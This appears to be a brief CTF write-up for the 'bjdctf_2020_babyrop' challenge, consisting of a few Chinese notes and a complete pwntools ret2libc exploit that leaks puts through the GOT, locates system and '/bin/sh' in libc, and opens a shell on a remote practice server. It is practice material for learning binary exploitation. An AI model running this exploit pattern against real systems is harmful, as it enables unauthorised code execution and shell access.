pwn | bjdctf_2020_babyrop

pwn | bjdctf_2020_babyrop

x64 ret2libc
常规题
注意调用约定即可

exp:

from pwn import *
from LibcSearcher.LibcSearcher import *

import struct
context.log_level = 'debug'

elf = ELF('./bjdctf_2020_babyrop')

p_plt_puts = elf.plt['puts']
p_got_puts = elf.got['puts']   # leak the addr of puts()
p_main = 0x00000000004006AD
p_poprdi_ret = 0x0000000000400733 


# p = process('./bjdctf_2020_babyrop')
p = remote('node4.buuoj.cn', 25974)


p.recvuntil('story!\n')

# rubbish + poprdiret + (arg to pop) + retaddr + retaddr_of_puts + arg1
payload = b'A' * (0x20+8) + p64(p_poprdi_ret) + p64(p_got_puts) + p64(p_plt_puts) + p64(p_main)

p.sendline(payload)

# recv addr of puts
_tmp = p.recvuntil('\n')[:-1]
print(_tmp)
p_libc_puts = struct.unpack('<Q', _tmp.ljust(8, b'\x00'))[0]
print(hex(p_libc_puts))

libc = LibcSearcher('puts', p_libc_puts)
p_libc_base = p_libc_puts - libc.dump('puts')
p_libc_binsh = p_libc_base + libc.dump('str_bin_sh')
p_libc_system = p_libc_base + libc.dump('system')

p.recvuntil('story!\n')

payload = b'A' * (0x20+8) + p64(p_poprdi_ret) + p64(p_libc_binsh) + p64(p_libc_system)
p.sendline(payload)


p.interactive()